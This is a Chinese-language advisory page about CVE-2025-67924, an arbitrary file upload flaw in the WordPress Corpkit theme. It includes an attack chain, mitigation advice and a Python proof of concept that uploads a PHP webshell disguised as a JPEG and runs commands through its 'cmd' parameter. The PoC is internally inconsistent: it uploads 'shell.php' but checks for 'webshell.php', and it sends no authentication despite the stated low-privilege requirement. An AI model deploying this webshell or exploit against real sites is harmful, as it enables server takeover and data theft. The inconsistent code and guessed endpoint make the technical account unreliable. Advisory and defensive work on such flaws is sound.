CVE-2025-67924: WordPress Corpkit主题任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-67924

漏洞类型

任意文件上传/WebShell上传

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Corpkit主题 (zozothemes)

漏洞概述

CVE-2025-67924是WordPress Corpkit主题中的一个严重安全漏洞，CVSS评分高达9.9分（严重级别）。该漏洞属于"危险类型文件的无限制上传"（Unrestricted Upload of File with Dangerous Type）类型，允许攻击者绕过安全限制，上传恶意文件（如WebShell）到目标Web服务器。Corpkit是一款由zozothemes开发的WordPress主题产品，广泛应用于企业网站和商业项目中。攻击者利用此漏洞可以完全控制受影响的Web服务器，执行任意代码，窃取敏感数据，或将服务器作为进一步攻击的跳板。由于该漏洞无需高权限认证即可利用（低权限即可），且无需用户交互，因此具有极高的实际威胁性。披露日期为2026年1月8日，由Patchstack安全团队发现并报告。

技术细节

该漏洞存在于Corpkit主题的文件上传功能中，具体问题在于服务器端缺乏对上传文件类型的严格验证。攻击者可以通过构造恶意请求，将.php、.phtml等WebShell文件伪装成图片或其他合法文件类型上传到服务器。服务器未对上传文件的扩展名、MIME类型和内容进行充分检查，导致恶意代码得以保存。一旦WebShell成功上传，攻击者即可通过HTTP请求执行任意PHP代码，实现远程命令执行。攻击者通常会尝试将WebShell上传到wp-content/themes/corpkit/等主题目录下，利用WordPress的目录结构特性使恶意文件被Web服务器解析执行。此漏洞的利用复杂度较低，攻击者无需复杂的攻击工具即可完成攻击。CVSS向量显示攻击向量为网络层面（AV:N），权限要求为低权限（PR:L），对机密性、完整性和可用性均造成高影响。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本及Corpkit主题，确认版本<=2.0以确定漏洞存在

STEP 2

步骤2: 定位上传端点

攻击者扫描wp-content/themes/corpkit/目录结构，找到文件上传处理脚本（upload-handler.php等）

STEP 3

步骤3: 构造恶意请求

攻击者创建包含恶意PHP代码的WebShell文件（如shell.php），通过修改MIME类型伪装为图片上传

STEP 4

步骤4: 文件上传

攻击者向上传端点发送POST请求，利用服务器端验证不足的缺陷，成功上传WebShell到服务器

STEP 5

步骤5: WebShell访问

攻击者通过HTTP请求访问上传的WebShell文件，使用cmd参数执行任意系统命令

STEP 6

步骤6: 持久化控制

攻击者建立持久化访问，可能创建额外后门、窃取数据库凭证、植入挖矿程序或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import os

# CVE-2025-67924 PoC - WordPress Corpkit Theme Arbitrary File Upload
# Target: WordPress site with Corpkit theme <= 2.0

target_url = "http://target-wordpress-site.com"
upload_endpoint = f"{target_url}/wp-content/themes/corpkit/includes/upload-handler.php"

# WebShell content - simple PHP backdoor
webshell = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; } ?>"

# Prepare the malicious file
files = {
    'file': ('shell.php', webshell, 'image/jpeg')
}

# Send the upload request
try:
    response = requests.post(upload_endpoint, files=files, timeout=10)
    
    if response.status_code == 200:
        print("[+] File uploaded successfully!")
        # Extract the uploaded file path from response
        uploaded_path = f"{target_url}/wp-content/uploads/webshell.php"
        print(f"[+] WebShell location: {uploaded_path}")
        
        # Test command execution
        test_cmd = "whoami"
        test_url = f"{uploaded_path}?cmd={test_cmd}"
        test_response = requests.get(test_url)
        
        if test_response.status_code == 200:
            print(f"[+] Command execution confirmed: {test_response.text.strip()}")
            print("[!] Vulnerability confirmed - WebShell uploaded successfully")
        else:
            print("[-] WebShell may not be at expected location")
    else:
        print(f"[-] Upload failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

WordPress Corpkit主题 <= 2.0

防御指南

临时缓解措施

在官方补丁发布前，建议立即采取以下临时缓解措施：1）暂时禁用或删除Corpkit主题；2）在Web服务器配置中禁用上传目录的PHP执行权限（创建.htaccess文件设置php_flag engine off，或在Nginx配置中添加location规则限制）；3）使用ModSecurity等WAF规则阻止.php、.phtml等危险文件扩展名的上传；4）限制非管理员用户的上传功能；5）启用WordPress安全插件如Wordfence进行实时监控和防护。